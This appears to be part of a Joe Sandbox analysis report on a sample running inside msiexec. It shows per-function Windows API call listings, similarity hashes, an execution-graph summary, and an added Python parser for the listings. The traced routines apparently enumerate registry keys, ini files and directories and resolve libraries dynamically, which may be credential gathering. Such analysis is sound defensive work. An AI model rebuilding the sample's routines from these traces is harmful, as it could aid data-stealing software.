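The block above shows a helper that builds the full path to shell32.dll under the system directory, loads it, and then resolves SHGetSpecialFolderPathW by name through GetProcAddress. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses one function's "APIs" listing in the format shown on this page into structured call records, separates calls inherited from subcalls from the function's own, and flags the LoadLibrary-then-GetProcAddress pattern together with the export names it resolves. The sample input is constructed from the lines of the block above; the line grammar it assumes (`Api.Module(args), ref: callsite`, with an optional `Part of subcall function <addr>:` prefix) is inferred from this report and is an assumption.

```python
"""Parse a Joe Sandbox per-function 'APIs' listing into structured call records.

Added example; not Joe Sandbox code. The format assumed for each bullet line is
    [Part of subcall function <addr>: ]<Api>.<Module>[(<args>)][,] ref: <callsite>
which is what the listing on this page shows.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the API lines of one function block, copied from the report.
SAMPLE_BLOCK = """\
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\\Windows\\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
Strings
"""

LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<module>[A-Za-z0-9_]+)"   # e.g. ??2@YAPAXI@Z.MSVCRT
    r"(?:\((?P<args>[^)]*)\))?"                        # argument list is optional
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    callsite: int
    subcall: Optional[int]  # callee address when the call is inherited from a subcall


def parse_api_block(text: str) -> List[ApiCall]:
    """Return the API calls of one function block; headings and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a != "")
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def api_histogram(calls: List[ApiCall], include_subcalls: bool = True) -> Counter:
    """Count API names, optionally restricted to the function's own call sites."""
    return Counter(c.api for c in calls if include_subcalls or c.subcall is None)


def resolves_dynamically(calls: List[ApiCall]) -> bool:
    """True when the function (or a callee) loads a library and looks up an export by name."""
    loads = any(c.api.startswith("LoadLibrary") for c in calls)
    lookups = any(c.api == "GetProcAddress" for c in calls)
    return loads and lookups


def resolved_exports(calls: List[ApiCall]) -> List[str]:
    """Export names passed to GetProcAddress as literal strings (not addresses or '?')."""
    names = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if not re.fullmatch(r"[0-9A-Fa-f]{8}|\?", name):
                names.append(name)
    return names


if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_BLOCK)
    for call in parsed:
        origin = f"via sub {call.subcall:08X}" if call.subcall is not None else "own"
        print(f"{call.callsite:08X} {origin:16} {call.api}.{call.module}{call.args}")
    print("dynamic resolution:", resolves_dynamically(parsed), resolved_exports(parsed))
```

Splitting inherited subcall lines from a function's own call sites matters when comparing functions across samples: the shared helper at 0040A804 is pulled into every caller's listing, so counting it each time inflates the similarity of otherwise unrelated functions.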
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow
                                                                                                    • String ID: MZ@
                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1860491036-0
                                                                                                    • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                    • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: bd9c2fbdafd9bd1a8ecc8c4fb1ddbe2ec69d0e4c44f89de98d5280552e6ae643
                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                    • Opcode Fuzzy Hash: bd9c2fbdafd9bd1a8ecc8c4fb1ddbe2ec69d0e4c44f89de98d5280552e6ae643
                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 726966127-0
                                                                                                    • Opcode ID: 02065ffbab0da3b6fd023f8001c1f0d8f69e37638dea0663f36a40e88b4833f8
                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                    • Opcode Fuzzy Hash: 02065ffbab0da3b6fd023f8001c1f0d8f69e37638dea0663f36a40e88b4833f8
                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 231171946-0
                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3669619086-0
                                                                                                    • Opcode ID: 33c6c4480df7d418dc9e483023a9b809fbb92cfa1889a22cfd9cfc0c18e735dc
                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                    • Opcode Fuzzy Hash: 33c6c4480df7d418dc9e483023a9b809fbb92cfa1889a22cfd9cfc0c18e735dc
                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1033339047-0
                                                                                                    • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                    • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                    • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                     • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1961120804-0
                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:2.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0.5%
                                                                                                    Total number of Nodes:762
                                                                                                    Total number of Limit Nodes:20
                                                                                                     execution_graph (text dump of the rendered graph; a node is written "<id> <virtual address> <APIs called>", a collapsed node "<id> <address> N API calls", an edge "<caller id>-><callee id>"; node ids are the sandbox's own. Addresses are in the 0x400000 PE image of process 15 (msiexec). The dump is summarised below by call chain: alternatives are separated by "/", collapsed callees are given as "(N API calls)".)
                                                                                                     CRT start-up: 44b49f -> 444c4a -> 444c56 GetModuleHandleA -> 444c68 __set_app_type __p__fmode __p__commode -> 444cfa -> 444d02 __setusermatherr / 444d0e -> 444e22 _controlfp -> 444d13 _initterm __getmainargs _initterm -> 444d6a GetStartupInfoA -> 444d9e GetModuleHandleA -> 40cf44 (main routine). Return path: 40cf64 -> 444dc8 exit -> 444dcf _cexit -> 444e04.
                                                                                                     Main routine 40cf44: 404a99 LoadLibraryA -> 404ac4 GetProcAddress -> 404add FreeLibrary / 404afc MessageBoxA -> 40cf60 -> 410d0e (410d17 LoadLibraryA, 410d2b GetProcAddress) -> 40cf6f -> 40ccd7 ??2@YAPAXI -> 40cd08 ??2@YAPAXI -> 40cd26 -> 404025 (6 API calls) / 40cd2d -> 40cd59 DeleteObject / 40cd66 -> 407088 -> 406fc7 memset _mbscpy -> 40709f CreateFontIndirectA -> 40cd6b -> 4019b5 (4019c2 strncat loop, 4019e5 memset LoadIconA) -> 40cdbf _mbscpy -> 40cf9b -> 407cbc (407948 free free, 407a1f malloc memcpy free free, 407d7a free, 40796e (7 API calls), 406f30 malloc memcpy free, 407a55 free) -> 407e30 _strcmpi -> 40cfc4 or 40cfd8.
                                                                                                       40cfc4 -> 409825 memset -> 4097ff (406f96 GetModuleFileNameA, 409805 strrchr, 409817 _mbscat) -> 409731 -> 40973e _mbscpy _mbscpy -> 409319 memset GetPrivateProfileStringA (409364 WritePrivateProfileStringA) -> 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset -> 4097c5 LoadStringA -> 4097db -> 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa (loop) -> 4097f3 -> teardown at 40d181.
                                                                                                       40cfd8 -> 4096f4 memset -> 40966c -> 406f81 GetFileAttributesA -> 40967a _mbscpy _mbscpy GetPrivateProfileIntA -> 409278 GetPrivateProfileStringA (three calls) -> 4096ee -> 407e30 _strcmpi -> 40cfee -> 40cff2 RegDeleteKeyA -> teardown / 40d007 EnumResourceTypesA -> 40d02f MessageBoxA -> teardown / 40d047 -> 40ce70 (collection, below) -> 40ced3 -> 40cdda (7 API calls) -> 40cece -> 40c3d0 memset GetModuleFileNameA strrchr -> 40c425 _mbscat _mbscpy _mbscpy -> 40c502 GetWindowPlacement / 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos -> 409b31 (409901 memset SendMessageA, 409868 SendMessageA) -> 40ba28 -> 40ba43 _mbsicmp, 40b5e5 (10 API calls) -> 406c62 LoadCursorA SetCursor -> 40ba8c -> 403c16 (collection, below), 404734 (40473b LoadLibraryA, 40474c GetProcAddress, 404785 FreeLibrary), 404785 FreeLibrary, 4107f1 FreeLibrary -> 40baa0 -> 407e30 _strcmpi -> 40bab0 -> 40baf1 qsort -> 40bafa SetCursor -> 40ceed -> 40affa (output, below) -> 40c580 (28 API calls) -> 40cf3f -> 40d061 ??3@YAXPAX (40d084 DeleteObject) -> teardown / 40d09e -> GUI, below.
                                                                                                     Collection 40ce70: 4023b2 -> 409c1c (409a32 ??3@YAXPAX x5, 409a83 ??2@YAPAXI ??2@YAPAXI, 409c80 memcpy memcpy loop, 408db6 (12 API calls), 409d18 ??2@YAPAXI x3, 409b9c: 407a55 free x4, 407a1f x4) -> 401e69 memset -> 410dbb (410d0e LoadLibraryA GetProcAddress, 4070ae GetVersionExA, 410dfd memset, 410d3d _mbscpy, 410add RegQueryValueExA, 410e7f _mbscpy) -> 401e9e strlen strlen -> 4070e3 strlen _mbscat _mbscpy _mbscat / 406f81 GetFileAttributesA -> 401ee6 strlen strlen -> 401c31 (410add RegQueryValueExA, 401c71 strchr, 401c85 strchr, 406f06 strlen memcpy) -> 401f75 -> 401f9c memset -> 410b62 RegEnumKeyExA loop at 401fc9: 401fd9 atoi, 401fef memset memset sprintf -> 410b1e (410add RegQueryValueExA), 406f81 GetFileAttributesA, 402076 memset memset strlen strlen, 4020dd strlen strlen, 402167 _mbscpy -> 402165 -> 402195 ExpandEnvironmentStringsA -> 406f81 GetFileAttributesA / 4021a8 _strcmpi -> 40ced3 or 40cece.
                                                                                                     Collection 403c16: 4107f1 FreeLibrary -> 403c30 LoadLibraryA -> 403c44 GetProcAddress -> 403c7b -> 404734 -> 403c86 -> 4036e5 x4 (403716 strchr, 4021b6 memset, 40373f _mbscpy _mbscpy strlen, 403789 sprintf, 4037a4 _mbscpy, 4023e5 (16 API calls)) -> 403cae -> 4085d2 (4082cd (11 API calls), 40860b memset, 410b62 RegEnumKeyExA, 40865c memset, 410add RegQueryValueExA, 40848b (10 API calls)) -> 403cba -> 40821d (408246 memset, 410b62 RegEnumKeyExA, 4080ed (11 API calls)) -> 403cc6 -> 4086e0 (4045db: 4045e3 LoadLibraryA, 4045f4 GetProcAddress x5, 404656 FreeLibrary; 408737 wcslen, 40877a wcsncmp, 408812 memset, 40883c memcpy wcschr, 4088c3 LocalFree, 40466b _mbscpy, 404734, 404785 FreeLibrary; 404656 FreeLibrary) -> 403cd2 -> 402bd1 (37 API calls) -> 403cf7 -> 402bd1 (37 API calls) -> 403d1c -> 402c5d (402c87 memset, 410b62 RegEnumKeyExA, 410b1e RegQueryValueExA, 402ce4 memset sprintf, 402d3a sprintf, 402bd1 (37 API calls)) -> 4070ae GetVersionExA -> 403d31 -> 402b22 (42 API calls) x3 -> 403dcd -> 410808 -> 4107f1 FreeLibrary -> 403ddd -> 404785 FreeLibrary -> 403de8 -> 402fdb x2 (403006 memset, 410b62 RegEnumKeyExA, 410b1e RegQueryValueExA, 403058 memset sprintf, 4030a2 memset, 402db3 (24 API calls)) -> 403e00 -> 4032b7 (4021b6 memset, 403166 strlen GetPrivateProfileStringA strchr strlen memcpy, 4032f8 memset GetPrivateProfileSectionA, 403350 strchr, 40339b strlen, 4023e5 (16 API calls)) -> 4034e4 memset memset -> 410b1e RegQueryValueExA -> 403546 _mbscpy -> 406d55 strlen _mbscat -> 403565 _mbscat -> 4033f0 (19 API calls) / 40357f -> 403985 -> 40466b _mbscpy -> 4039aa (40f6e2: 40466b _mbscpy, 4045db, 404734, 40f797 WideCharToMultiByte, 40f7b8 strlen, 40f7c8 _mbscpy, 40f7d9 LocalFree, 404656 FreeLibrary, 404785 FreeLibrary; 40f460 (12 API calls); 4038e8 (21 API calls)) -> 4039ff -> 404785 FreeLibrary -> 403a0b -> 4037ca memset memset -> 444551 memset (410add RegQueryValueExA x2, 444879 (30 API calls)) -> 40381a -> 4021b6 memset -> 40382e -> 406f06 x2 -> 403855 strchr -> 403884 _mbscpy / 403897 strlen -> 4038a4 sprintf -> 4038bf _mbscpy -> 4023e5 (16 API calls) -> 4038e2 -> 40f334 (333 API calls) / 403e3b -> 403e46 _mbscpy -> 40f334 (333 API calls) / 403e73 -> 40fb00 (40fb55 RegQueryValueExA, 404734, 40fbdd memcpy memcpy, 40f802 (7 API calls), 40fc19 LocalFree) -> 403e7f -> 40f96c (4070ae GetVersionExA, 4045db, 40fa13 memset WideCharToMultiByte, 40fa43 _strnicmp, 40fa5b WideCharToMultiByte, 40fa88 WideCharToMultiByte, 404656 FreeLibrary) -> 403e85 -> 4442ea memset -> 410dbb -> 40759e strlen strlen (4075bb _mbscat) -> 444212 directory walk (407e9d: 407f90 FindClose, 406f06, 407ebd strlen strlen, 4070e3; 407ef8: 407f03 FindFirstFileA, 407f24 FindNextFileA, 407f46 strlen strlen, 407f90 FindClose; 407e62 strcmp strcmp; 444196 (51 API calls); 444212 (64 API calls) recursively) -> 4442e4 -> 410dbb -> 444350 -> 40759e -> 444212 -> 444366 memset memset -> 410b1e RegQueryValueExA -> 4443b9 ExpandEnvironmentStringsA strlen -> 4443f4 _strcmpi -> 403e91 / 44440c -> 444212 -> 403e91 -> 40baa0.
